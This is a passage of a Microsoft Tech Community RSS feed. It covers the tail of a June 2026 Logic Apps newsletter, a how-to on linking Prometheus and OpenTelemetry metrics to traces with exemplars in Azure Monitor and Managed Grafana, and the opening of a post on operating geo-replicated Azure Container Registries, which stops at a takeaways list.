&lt;P&gt;Azure Logic Apps Agent Loop now supports a JavaScript code interpreter, extending earlier code‑execution support and enabling reliable computations, validations, and transformations alongside LLMs. The runtime executes generated or pre‑written code inside a V8 isolate using the isolated‑vm library, providing memory limits, timeouts, and failure isolation (not a full sandbox) to reduce blast radius. A worked example shows expense‑validation with agent tools orchestrated in a workflow. For Consumption, attaching an Integration Account provides isolated compute for the interpreter. The capability helps teams combine deterministic steps with agentic reasoning to deliver robust, auditable outcomes.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://techcommunity.microsoft.com/blog/integrationsonazureblog/bulk-configure-diagnostic-settings-on-azure-logic-apps-consumptions/4521454" target="_blank" rel="noopener noreferrer"&gt;Bulk-configure diagnostic settings on Azure Logic Apps Consumptions&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;LA‑BulkDiag is a single‑file PowerShell script that bulk‑applies diagnostic settings across Logic Apps Consumption workflows in a resource group. It inventories workflows, supports quick scopes (bare/all/pick), verifies destinations, auto‑renames on name collisions, and ships with 129 Pester tests. Presets cover logs, metrics, and workflow‑runtime categories; selection grammar enables non‑interactive runs suitable for CI. The post includes quick‑start commands and clarifies scope: it targets Consumption only (not Standard) and doesn’t configure Event Hub sinks. The result is faster, consistent observability at scale without repetitive portal clicks or accidental overwrites.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://techcommunity.microsoft.com/blog/integrationsonazureblog/clean-up-idle-and-always-failing-azure-logic-app-consumption/4521728" target="_blank" rel="noopener noreferrer"&gt;Clean up idle and always-failing Azure Logic App Consumption&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;LA‑CleanUp is a PowerShell utility that scans a subscription for Logic Apps Consumption workflows, classifying them as Idle (no runs in N days) or AlwaysFailing (runs in the window with zero successes). It can export candidates to CSV, then guide per‑item deletion with y/N/q prompts, reporting final counts. Under the hood, it uses OData filters and $top=1 queries for fast server‑side checks, caches an ARM token once, and intentionally avoids cross‑subscription operations. Scope notes: it doesn’t touch Standard workflows or API connections. The tool reduces noise, costs, and operational drag from abandoned or broken apps.&lt;/P&gt;
&lt;HR /&gt;
&lt;H1 id="communitynews"&gt;News from our community&lt;/H1&gt;
&lt;H5&gt;&lt;A href="https://github.com/balbrench/cci-spec2integration" target="_blank" rel="noopener noreferrer"&gt;Spec2Integration&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Post by &lt;A href="https://uk.linkedin.com/in/balbir-singh-b449352?trk=public_post_feed-actor-name" target="_blank" rel="noopener nofollow noreferrer"&gt;&lt;EM&gt;Balbir Singh&lt;/EM&gt;&lt;/A&gt;&lt;/P&gt;
&lt;P&gt;Spec2Integration proposes a spec-driven approach to building Azure Integration Services solutions. The open-source toolkit guides teams from a product brief through specification, modeling, contracts, mapping, and architecture to a deployable implementation targeting Azure Logic Apps, Functions, and related services. It includes governance gates for idempotency, observability, retries, and PII handling, plus a VS Code extension that visualizes pipeline status and the integration representation. Templates and tooling support greenfield projects and BizTalk migrations. The result aims to standardize repeatable steps, reduce failure modes, and accelerate delivery while keeping architectural control outside individual workflows.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://www.linkedin.com/pulse/stateful-orchestration-azure-when-logic-apps-break-do-al-ghoniem-mba-xbbhc" target="_blank" rel="noopener noreferrer"&gt;Stateful Orchestration in Azure: When Logic Apps Break, and What to Do Instead&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Post by &lt;A href="https://au.linkedin.com/in/alghoniem" target="_blank" rel="noopener nofollow noreferrer"&gt;&lt;EM&gt;Al Ghoniem, MBA&lt;/EM&gt;&lt;/A&gt;&lt;/P&gt;
&lt;P&gt;This article examines where stateful orchestration with Azure Logic Apps can fall short and how to design around those gaps. It differentiates execution state from business state and highlights common failure modes: long-running instances, retry-induced duplicates, partial completion across SAP/Oracle/APIs, lost correlation, and unowned DLQs. It then contrasts orchestration choices—stateful Logic Apps, Durable Functions, Service Bus–backed orchestration, and choreography—emphasizing idempotency, correlation, reconciliation, and compensation. The guidance steers architects toward a control and observability layer so production incidents can be traced, replayed, and recovered without relying on workflow run history alone.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://www.youtube.com/watch?v=zjRm58mFTqY" target="_blank" rel="noopener noreferrer"&gt;Logic Apps Announcements at Microsoft Build&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Video by &lt;A href="https://de.linkedin.com/in/sebastianmeyerit?trk=public_post_feed-actor-name" target="_blank" rel="noopener nofollow noreferrer"&gt;&lt;EM&gt;Sebastian Meyer&lt;/EM&gt;&lt;/A&gt;&lt;/P&gt;
&lt;P&gt;This video recaps Logic Apps announcements from Microsoft Build with insights from a member of the product team. It highlights newly introduced capabilities and shares resources for deeper dives. Viewers get a concise overview of what’s new, why it matters for integration practitioners, and where to learn more. The discussion points architects toward practical use cases and next steps, making it a useful primer for anyone assessing roadmap impacts on existing or upcoming Azure Integration Services projects.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://www.linkedin.com/pulse/logic-apps-standard-vs-consumption-which-plan-should-you-choose-azl8e?trk=public_post_feed-article-content" target="_blank" rel="noopener noreferrer"&gt;Logic Apps Standard vs. Consumption: Which Plan Should You Choose?&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Post by &lt;A href="https://ae.linkedin.com/in/chiranjibghatak?trk=public_post_feed-actor-name" target="_blank" rel="noopener nofollow noreferrer"&gt;&lt;EM&gt;Chiranjib Ghatak&lt;/EM&gt;&lt;/A&gt;&lt;/P&gt;
&lt;P&gt;The article compares Logic Apps Standard and Consumption, explaining differences in hosting models, pricing, networking, and development experience. It outlines when to pick each plan, noting Standard’s single-tenant model, VNet/private endpoints, built-in connectors, and local DevOps workflow, versus Consumption’s pay-per-execution model and simplicity for sporadic or low-volume workloads. It also covers performance trade-offs, stateful vs. stateless options available in Standard, and typical enterprise scenarios where Standard provides predictable costs and better throughput.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://sahinozdemir.nl/azure-connector-namespaces-managed-connectors-beyond-logic-apps" target="_blank" rel="noopener noreferrer"&gt;Azure Connector Namespaces: Managed Connectors Beyond Logic Apps&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Post by &lt;A href="https://nl.linkedin.com/in/%C5%9Fahin-%C3%B6zdemir-2058666?trk=public_post_feed-actor-name" target="_blank" rel="noopener nofollow noreferrer"&gt;&lt;EM&gt;Şahin Özdemir&lt;/EM&gt;&lt;/A&gt;&lt;/P&gt;
&lt;P&gt;This post introduces Azure Connector Namespaces and previews managed connectors for Azure Functions, extending the Logic Apps connector ecosystem to more compute services. It explains the motivation, how namespaces decouple connectors from workflows, and the benefits: reduced custom code, consistent authentication via managed identity, and reuse of Microsoft-managed integrations. A step-by-step walkthrough shows creating a namespace, adding a managed connector, and using the Azure Connectors .NET SDK in Functions, illustrating how teams can standardize connectivity while keeping business logic in code.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://www.sonnygillissen.nl/blog/azure/azure-logic-apps/stop-working-harder-and-start-flowing-smarter-with-logic-apps-automation/" target="_blank" rel="noopener noreferrer"&gt;Stop working harder and start flowing smarter, with Logic Apps Automation&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Post by &lt;A href="https://nl.linkedin.com/in/sonnygillissen?trk=public_post_feed-actor-name" target="_blank" rel="noopener nofollow noreferrer"&gt;&lt;EM&gt;Sonny Gillissen&lt;/EM&gt;&lt;/A&gt;&lt;/P&gt;
&lt;P&gt;Sonny Gillissen explores Logic Apps Automation, a new, governed experience for building enterprise automations. He explains the Project → Application → Workflow model, dedicated portal (auto.azure.com), and reusable Sandboxes for agent code. The post shows how the AI assistant can scaffold workflows from intent, with Knowledge sources to ground agents, while monitoring and analytics provide visibility. Benefits include familiar Logic Apps design, reduced operational overhead, and scale-to-zero. Current gaps are noted—OBO auth shift, occasional assistant syntax issues, managed vs. built‑in connector choices, no migration tooling yet, and pending VNet/private endpoint support.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://anithasantosh.wordpress.com/2026/05/05/dixf-export-with-dynamic-filter-using-logic-apps/" target="_blank" rel="noopener noreferrer"&gt;Stop Using Static Filters! Automate DIXF Exports with Logic App&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Post by &lt;A href="https://uk.linkedin.com/in/anithaeswaran?trk=public_post_feed-actor-name" target="_blank" rel="noopener nofollow noreferrer"&gt;&lt;EM&gt;Anitha Eswaran&lt;/EM&gt;&lt;/A&gt;&lt;/P&gt;
&lt;P&gt;Anitha Eswaran demonstrates how to make DIXF exports in D365FO dynamic using Azure Logic Apps and a small X++ customization. A custom OData action updates the DIXF Definition Group filter at runtime based on a parameter such as Customer Group. A Logic App triggered by a business event parses the input, stores the value, calls the OData action, invokes the standard ExportToPackage API, and then retrieves the download URL via GetExportedPackageUrl to fetch the ZIP with a time‑limited SAS token. Screenshots and code samples illustrate the end‑to‑end flow and implementation details.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://www.youtube.com/watch?v=yF8YB6ag_HY" target="_blank" rel="noopener noreferrer"&gt;Logic Apps Agent Loops: Master Class&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Video by &lt;A href="https://www.linkedin.com/in/stephen-w-thomas?trk=public_post_feed-actor-name" target="_blank" rel="noopener nofollow noreferrer"&gt;&lt;EM&gt;Stephen W Thomas&lt;/EM&gt;&lt;/A&gt;&lt;/P&gt;
&lt;P&gt;Stephen W Thomas compiles his full Logic Apps Agent Loop series into one master‑class video. It covers getting started with Agent Loop on Logic Apps Standard, a human‑in‑the‑loop pattern used to resolve failed code translations, interactive chat agents with secure website embedding via Easy Auth, and when to choose the Consumption tier for simpler, pay‑as‑you‑go deployments. The chaptered format lets viewers jump to relevant topics. The emphasis is on the orchestration pattern—agents that select and compose tools to achieve goals—offering a practical foundation for teams moving from deterministic workflows toward agentic automation.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://dev.to/imdj/forget-sampling-this-one-hostjson-setting-cuts-logic-apps-telemetry-costs-by-80-2dpj" target="_blank" rel="noopener noreferrer"&gt;Forget Sampling — This One host.json Setting Cuts Logic Apps Telemetry Costs by 80%&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Post by &lt;A href="https://be.linkedin.com/in/danielj45?trk=public_post_feed-actor-name" target="_blank" rel="noopener nofollow noreferrer"&gt;&lt;EM&gt;Daniel Jonathan&lt;/EM&gt;&lt;/A&gt;&lt;/P&gt;
&lt;P&gt;This article tackles high Application Insights ingestion costs in Logic Apps Standard and shows a data‑driven path to reduce spend. Through a controlled experiment, it demonstrates that switching Runtime.ApplicationInsightTelemetryVersion to v2 in host.json delivers an ~80% reduction in telemetry costs without sacrificing troubleshooting capability. Further options include disabling dependency tracking (which eliminates AppDependencies, with the trade‑off of losing per‑call HTTP detail) and using adaptive sampling, with exceptions excluded from sampling, for marginal additional savings. It also explains why some run‑level telemetry bypasses sampling and how to toggle sampling via an environment variable for short‑term diagnostics.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://www.linkedin.com/pulse/production-only-truth-integration-marcelo-gomes-bwlne?trk=public_post_feed-article-content" target="_blank" rel="noopener noreferrer"&gt;Production Is the Only Truth in Integration&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Post by &lt;A href="https://pt.linkedin.com/in/marcelogomesdasilva/en?trk=public_post_feed-actor-name" target="_blank" rel="noopener nofollow noreferrer"&gt;&lt;EM&gt;Marcelo Gomes&lt;/EM&gt;&lt;/A&gt;&lt;/P&gt;
&lt;P&gt;This piece reframes integration success through a production‑first lens. It argues that reliability emerges when systems are designed for failure as the norm, not the exception. The article urges separating orchestration from business logic—using tools like Azure Logic Apps for coordination and Azure Functions for rules and transformations—to keep retries safe and evolution predictable. It positions production‑readiness as a design concern, emphasizing idempotency, replay, observability, runbooks, and ownership. The practical outcome is reduced operational risk and cost, more predictable behavior, and greater business trust in automated processes.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://youtu.be/GhSlwiGYzd8" target="_blank" rel="noopener noreferrer"&gt;DevUP Talks #05 – Logic Apps Tips &amp;amp; Tricks with Sandro Pereira&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Video by &lt;A href="https://se.linkedin.com/in/logdberg?trk=public_post_feed-actor-name" target="_blank" rel="noopener nofollow noreferrer"&gt;&lt;EM&gt;Mattias Lögdberg&lt;/EM&gt;&lt;/A&gt;&lt;/P&gt;
&lt;P&gt;In this session, Sandro Pereira distills practical guidance from real projects to help teams build more resilient Logic Apps. Topics include applying environment‑specific timer conditions, deploying Logic Apps in a disabled state to control activation during releases, and using a User‑Assigned Managed Identity with Azure Service Bus in Logic Apps Standard. The video focuses on patterns that improve reliability, security, and operational control across environments, offering actionable advice for developers and architects working in Azure Integration Services who want fewer surprises in production and a smoother deployment lifecycle.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://blog.sandro-pereira.com/2026/05/06/logic-apps-service-bus-user-assigned-managed-identity/" target="_blank" rel="noopener noreferrer"&gt;Logic Apps: Service Bus with User‑Assigned Managed Identity&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Post by &lt;A href="https://pt.linkedin.com/in/sandropereira?trk=public_post_feed-actor-name" target="_blank" rel="noopener nofollow noreferrer"&gt;&lt;EM&gt;Sandro Pereira&lt;/EM&gt;&lt;/A&gt;&lt;/P&gt;
&lt;P&gt;This best‑practices guide shows how to configure the Azure Service Bus connector in Logic Apps Standard to use a user‑assigned managed identity. Sandro Pereira explains why system‑assigned identities complicate CI/CD—RBAC can’t be fully declared until the identity exists—then demonstrates a pattern that keeps deployments reproducible. The approach uses app settings for the Service Bus namespace and identity resource ID, a custom serviceProviderConnections entry referencing those settings, and workflow actions bound to that connection. The result is secretless, declarative authentication that avoids RBAC timing issues across environments.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://blog.sandro-pereira.com/2024/02/09/logic-app-consumption-bulk-failed-runs-resubmit-tool/" target="_blank" rel="noopener noreferrer"&gt;Logic App Consumption Bulk Failed Runs Resubmit Tool&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Post by &lt;A href="https://pt.linkedin.com/in/sandropereira?trk=public_post_feed-actor-name" target="_blank" rel="noopener nofollow noreferrer"&gt;&lt;EM&gt;Sandro Pereira&lt;/EM&gt;&lt;/A&gt;&lt;/P&gt;
&lt;P&gt;Sandro Pereira introduces a small .NET Windows utility that lists and bulk resubmits failed Logic Apps Consumption runs. After authenticating to Azure, users supply the Logic App name, resource group, and subscription. The tool can optionally filter by a date range; otherwise, it returns up to 250 failed runs for fast triage. It targets a common pain point that the portal doesn’t fully streamline and includes a link to the GitHub source so teams can adapt or integrate it into operational workflows. A concise “one‑minute brief” outlines the problem and practical benefits.&lt;/P&gt;
&lt;H5&gt;&lt;A href="https://blog.sandro-pereira.com/2026/04/30/control-initial-state-logic-apps-standard-workflows/" target="_blank" rel="noopener noreferrer"&gt;Control the Initial State of Logic Apps Standard Workflows&lt;/A&gt;&lt;/H5&gt;
&lt;P&gt;Post by &lt;A href="https://pt.linkedin.com/in/sandropereira?trk=public_post_feed-actor-name" target="_blank" rel="noopener nofollow noreferrer"&gt;&lt;EM&gt;Sandro Pereira&lt;/EM&gt;&lt;/A&gt;&lt;/P&gt;
&lt;P&gt;This tip explains how to prevent Logic Apps Standard workflows from starting immediately after deployment, a common production risk. Instead of a state property in ARM/Bicep, the initial state is controlled via App Settings on the underlying App Service. By setting Workflows.{workflowName}.FlowState to Disabled (in local.settings.json and/or app settings), where {workflowName} stands for the name of the workflow, teams ensure workflows deploy in a safe, non‑running state. The article outlines the rationale and the differences from Consumption, and provides concrete examples and screenshots for adopting the practice across environments.&lt;/P&gt;</description>
      <pubDate>Mon, 08 Jun 2026 19:10:51 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/azure-integration-services-blog/logic-apps-aviators-newsletter-june-2026/ba-p/4526525</guid>
      <dc:creator>WSilveira</dc:creator>
      <dc:date>2026-06-08T19:10:51Z</dc:date>
    </item>
    <item>
      <title>Connect Metrics to Traces with Exemplars in Azure Monitor</title>
      <link>https://techcommunity.microsoft.com/t5/azure-observability-blog/connect-metrics-to-traces-with-exemplars-in-azure-monitor/ba-p/4525714</link>
      <description>&lt;P&gt;Following Microsoft’s recent &lt;A href="https://techcommunity.microsoft.com/blog/azureobservabilityblog/direct-opentelemetry-ingestion-into-azure-monitor-is-now-generally-available/4524044" target="_blank" rel="noopener"&gt;GA announcement for OpenTelemetry (OTel) support&lt;/A&gt;, we are excited to announce support for &lt;STRONG&gt;Exemplars&lt;/STRONG&gt; for customers instrumenting metrics with Prometheus or OpenTelemetry and traces using OpenTelemetry, enhancing Azure Monitor’s integrated observability experience for cloud-native applications.&lt;/P&gt;
&lt;P&gt;Modern cloud-native applications generate enormous volumes of telemetry. Metrics help teams detect that something is wrong, but traces explain &lt;EM&gt;why&lt;/EM&gt;. Exemplars bridge these two worlds by attaching trace references directly to metric data points, making it dramatically easier to pivot from a spike in latency or errors to the exact distributed trace responsible for the issue.&lt;/P&gt;
&lt;P&gt;With Azure Monitor, customers can now ingest metrics with exemplars and visualize them in Azure Managed Grafana. This enables seamless correlation between metrics and traces, helping engineering teams troubleshoot issues faster and reduce mean time to resolution (MTTR).&lt;/P&gt;
&lt;H1&gt;Why Exemplars Matter&lt;/H1&gt;
&lt;P&gt;Traditional monitoring workflows often require users to manually correlate data across multiple systems. Exemplars simplify this workflow by embedding trace context directly into metric samples. For example, if a latency metric spikes at a specific timestamp, the exemplar associated with that data point can link directly to the distributed trace responsible for the outlier.&lt;/P&gt;
&lt;P&gt;This provides several benefits:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Faster root cause analysis&lt;/LI&gt;
&lt;LI&gt;Quicker transition from aggregate metrics to request-level details&lt;/LI&gt;
&lt;LI&gt;Simplified debugging workflows for SRE and platform teams&lt;/LI&gt;
&lt;LI&gt;Better observability experiences for microservices and distributed applications&lt;/LI&gt;
&lt;/UL&gt;
&lt;H1&gt;Unified Observability with Azure Monitor&lt;/H1&gt;
&lt;P&gt;With Azure Monitor and Azure Managed Grafana, you can now:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Ingest OTLP or Prometheus metrics with exemplars into Azure Monitor Workspace&lt;/LI&gt;
&lt;LI&gt;Store and analyze traces in Azure Monitor Application Insights&lt;/LI&gt;
&lt;LI&gt;Visualize exemplar markers directly in Grafana charts&lt;/LI&gt;
&lt;LI&gt;Navigate from a metric spike to the exact distributed trace associated with that data point&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;By combining these signals in a single observability platform, organizations can correlate infrastructure health, application behavior, and request traces without context switching between tooling.&lt;/P&gt;
&lt;H1&gt;How It Works&lt;/H1&gt;
&lt;P&gt;Once metrics, exemplars, and traces are ingested into Azure Monitor, Azure Managed Grafana can consume exemplar information from the configured Prometheus data source. When exemplars are enabled in Grafana dashboards, users will see markers associated with individual metric data points. Selecting an exemplar opens the associated trace in Azure Monitor, providing end-to-end diagnostic context.&lt;/P&gt;
&lt;img /&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;H1&gt;Getting Started&lt;/H1&gt;
&lt;H2&gt;Set up data ingestion:&lt;/H2&gt;
&lt;UL&gt;
&lt;LI&gt;Instrument your application to emit OpenTelemetry traces and either OpenTelemetry or Prometheus metrics with exemplars, and send that telemetry to Azure Monitor through the OpenTelemetry Collector. Follow the instructions in &lt;A href="https://learn.microsoft.com/en-us/azure/azure-monitor/containers/opentelemetry-protocol-ingestion" target="_blank" rel="noopener"&gt;Ingest OTLP Data into Azure Monitor with OTel Collector - Azure Monitor | Microsoft Learn&lt;/A&gt;. After this step, you will have Log Analytics Workspace, Azure Monitor Workspace, and Application Insights resources set up to store the telemetry data.&lt;/LI&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/azure/managed-grafana/quickstart-managed-grafana-portal" target="_blank" rel="noopener"&gt;Create an Azure Managed Grafana&lt;/A&gt; instance and connect it to the Azure Monitor Workspace by navigating to your Azure Monitor Workspace in the Azure portal and then selecting “Linked Grafana workspaces”. To learn more, see &lt;A href="https://learn.microsoft.com/en-us/azure/azure-monitor/metrics/azure-monitor-workspace-manage?tabs=azure-portal#link-a-grafana-workspace" target="_blank" rel="noopener"&gt;Manage an Azure Monitor workspace - Azure Monitor | Microsoft Learn&lt;/A&gt;.&lt;/LI&gt;
&lt;LI&gt;Optionally, &lt;A href="https://learn.microsoft.com/azure/azure-monitor/containers/kubernetes-monitoring-tutorial" target="_blank" rel="noopener"&gt;enable Azure Managed Prometheus&lt;/A&gt; on your AKS cluster or use remote-write and configure it to use the same Azure Monitor Workspace to centralize infrastructure and application metrics.&lt;/LI&gt;
&lt;/UL&gt;
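&lt;P&gt;Before you move on, it can help to confirm that your application actually emits exemplars. The following is a minimal sketch, assuming the application exposes a Prometheus scrape endpoint. The URL &lt;CODE&gt;http://localhost:8080/metrics&lt;/CODE&gt; is a placeholder for illustration and is not part of the Azure Monitor setup. Prometheus client libraries generally include exemplars only in the OpenMetrics exposition format, so the request asks for that format explicitly.&lt;/P&gt;
&lt;PRE class="language-bash"&gt;&lt;CODE&gt;# Hypothetical endpoint; replace with your application's scrape URL.
METRICS_URL="http://localhost:8080/metrics"

# Request the OpenMetrics format and keep only samples that carry a trace_id exemplar.
curl -s -H "Accept: application/openmetrics-text" "$METRICS_URL" | grep "trace_id"
&lt;/CODE&gt;&lt;/PRE&gt;
&lt;P&gt;In the OpenMetrics format, an exemplar follows the sample value after a &lt;CODE&gt;#&lt;/CODE&gt;, for example &lt;CODE&gt;http_request_duration_seconds_bucket{le="0.5"} 129 # {trace_id="4bf92f3577b34da6a3ce929d0e0e4736"} 0.43&lt;/CODE&gt;. The metric name and values here are illustrative. If your application sends metrics over OTLP only, this check does not apply.&lt;/P&gt;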
&lt;H2&gt;Enable Exemplars in Azure Managed Grafana:&lt;/H2&gt;
&lt;P&gt;After setting up the data ingestion, ensure that logs and traces are flowing into Log Analytics Workspace, and metrics are flowing into Azure Monitor Workspace.&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Step 1: Enable Exemplars on Prometheus Data Source in Azure Managed Grafana&lt;/STRONG&gt;&lt;/P&gt;
&lt;OL&gt;
&lt;LI&gt;Navigate to &lt;STRONG&gt;Connections&lt;/STRONG&gt; -&amp;gt; &lt;STRONG&gt;Data Sources&lt;/STRONG&gt; in Azure Managed Grafana. Since you have connected Azure Managed Grafana to Azure Monitor Workspace, you will see the data source (Managed_Prometheus_&amp;lt;AMW-Name&amp;gt;) already configured. If the data source is not configured, follow the steps &lt;A href="https://learn.microsoft.com/azure/managed-grafana/how-to-connect-azure-monitor-workspace" target="_blank" rel="noopener"&gt;here&lt;/A&gt; to add your Azure Monitor Workspace as a data source.&lt;/LI&gt;
&lt;LI&gt;Open the data source configuration.&lt;/LI&gt;
&lt;LI&gt;Click &lt;STRONG&gt;Add Exemplars&lt;/STRONG&gt; to enable exemplar support.&lt;/LI&gt;
&lt;/OL&gt;
&lt;img /&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Step 2: Configure Trace Linking with Azure Monitor&lt;/STRONG&gt;&lt;/P&gt;
&lt;OL&gt;
&lt;LI&gt;In the exemplar configuration section, toggle &lt;STRONG&gt;Internal Link&lt;/STRONG&gt; to &lt;STRONG&gt;On&lt;/STRONG&gt;.&lt;/LI&gt;
&lt;LI&gt;Select &lt;STRONG&gt;Azure Monitor&lt;/STRONG&gt; as the data source.&lt;/LI&gt;
&lt;LI&gt;In the &lt;STRONG&gt;Label Name&lt;/STRONG&gt; field, enter the name of the exemplar label that holds the trace ID, for example &lt;CODE&gt;trace_id&lt;/CODE&gt;.&lt;/LI&gt;
&lt;LI&gt;Click &lt;STRONG&gt;Save &amp;amp; Test&lt;/STRONG&gt;.&lt;/LI&gt;
&lt;/OL&gt;
&lt;img /&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;This configuration enables direct navigation from exemplar markers in Grafana charts to the associated traces stored in Azure Monitor. Azure Managed Grafana also supports trace correlation with other tracing solutions, such as Jaeger. To use a different tracing solution, configure the link that is appropriate for it.&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Step 3: Enable Exemplars in Dashboards&lt;/STRONG&gt;&lt;/P&gt;
&lt;OL&gt;
&lt;LI&gt;Navigate to a Grafana dashboard that uses your configured Prometheus data source.&lt;/LI&gt;
&lt;LI&gt;Open the panel options for a metrics chart.&lt;/LI&gt;
&lt;LI&gt;Toggle &lt;STRONG&gt;Exemplars&lt;/STRONG&gt; to &lt;STRONG&gt;On&lt;/STRONG&gt;.&lt;/LI&gt;
&lt;/OL&gt;
&lt;img /&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;Once enabled, exemplar markers appear on supported metric visualizations. Selecting a marker shows the exemplar details, along with an option to open the corresponding distributed trace in Azure Monitor.&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;img /&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;To learn more, visit&amp;nbsp;&lt;A href="https://aka.ms/azmon-exemplars" target="_blank" rel="noopener"&gt;https://aka.ms/azmon-exemplars&lt;/A&gt;&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;</description>
      <pubDate>Mon, 08 Jun 2026 17:21:43 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/azure-observability-blog/connect-metrics-to-traces-with-exemplars-in-azure-monitor/ba-p/4525714</guid>
      <dc:creator>sunayanasingh</dc:creator>
      <dc:date>2026-06-08T17:21:43Z</dc:date>
    </item>
    <item>
      <title>Designing for High Availability: The Operational Reference for Running a Geo-Replicated ACR</title>
      <link>https://techcommunity.microsoft.com/t5/apps-on-azure-blog/designing-for-high-availability-the-operational-reference-for/ba-p/4526465</link>
      <description>&lt;P&gt;By&amp;nbsp;&lt;A class="lia-external-url" href="https://www.linkedin.com/in/johnsonshi/" target="_blank" rel="noopener"&gt;Johnson Shi&lt;/A&gt;&lt;EM&gt;, &lt;A class="lia-external-url" href="https://www.linkedin.com/in/zhuyul/" target="_blank" rel="noopener"&gt;Zoey (Zhuyu) Li&lt;/A&gt;, &lt;A class="lia-external-url" href="https://www.linkedin.com/in/huangli-wu-806070126/" target="_blank" rel="noopener"&gt;Huangli Wu&lt;/A&gt;&lt;/EM&gt;&lt;/P&gt;
&lt;H2 id="introduction"&gt;Introduction&lt;/H2&gt;
&lt;P&gt;Three of the most common questions we hear from enterprise teams running geo-replicated Azure Container Registries (ACR) are:&lt;/P&gt;
&lt;OL&gt;
&lt;LI&gt;&lt;STRONG&gt;"How do I control which region serves my traffic?"&lt;/STRONG&gt; — When my AKS clusters are spread across regions, can I pin each one to its co-located replica, or am I stuck with however the global endpoint routes?&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;"What happens during a regional incident — is failover automatic or do I have to act?"&lt;/STRONG&gt; — If the registry in one region degrades, does the global endpoint reroute on its own, or do I need to manually disable the affected replica?&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;"What happens after the region recovers — does traffic return on its own?"&lt;/STRONG&gt; — Is there a cooldown, a quarantine, or any manual step before failback?&lt;/LI&gt;
&lt;/OL&gt;
&lt;P&gt;We answer those head-on, then go deeper on the operational details that come up when you actually run a geo-replicated registry: authentication across endpoint switches, throttling under load concentration, eventual-consistency failure modes, home region outage scope, webhooks, and private endpoint interaction. We draw on the &lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-geo-replication" target="_blank" rel="noopener"&gt;official geo-replication docs&lt;/A&gt;, the &lt;A class="lia-internal-link lia-internal-url lia-internal-url-content-type-blog" href="https://techcommunity.microsoft.com/blog/appsonazureblog/health-aware-failover-for-azure-container-registry-geo-replication/4501730" target="_blank" rel="noopener" data-lia-auto-title="global endpoint health-aware failover blog" data-lia-auto-title-active="0"&gt;global endpoint health-aware failover blog&lt;/A&gt;, the &lt;A class="lia-internal-link lia-internal-url lia-internal-url-content-type-blog" href="https://techcommunity.microsoft.com/blog/appsonazureblog/determinism-over-magic-the-engineering-design-behind-azure-container-registry-re/4524101" target="_blank" rel="noopener" data-lia-auto-title="regional endpoints engineering design implementation" data-lia-auto-title-active="0"&gt;regional endpoints engineering design implementation&lt;/A&gt;, the regional endpoints &lt;A class="lia-internal-link lia-internal-url lia-internal-url-content-type-blog" href="https://techcommunity.microsoft.com/blog/appsonazureblog/regional-endpoints-for-azure-container-registry-geo-replication-%E2%80%94-now-in-public-/4525717" target="_blank" rel="noopener" data-lia-auto-title="public preview" data-lia-auto-title-active="0"&gt;public preview&lt;/A&gt; and &lt;A class="lia-internal-link lia-internal-url lia-internal-url-content-type-blog" 
href="https://techcommunity.microsoft.com/blog/appsonazureblog/regional-endpoints-for-geo-replicated-azure-container-registries-private-preview/4496186" target="_blank" rel="noopener" data-lia-auto-title="private preview" data-lia-auto-title-active="0"&gt;private preview&lt;/A&gt; announcements, and the&amp;nbsp;&lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/azure/container-registry/container-registry-endpoint-reference" target="_blank" rel="noopener"&gt;ACR reference for various registry endpoints&lt;/A&gt;. This post also draws on notes from the ACR product team on roadmap items that aren't yet documented elsewhere.&lt;/P&gt;
&lt;H2 id="key-takeaways"&gt;Key Takeaways&lt;/H2&gt;
&lt;UL&gt;
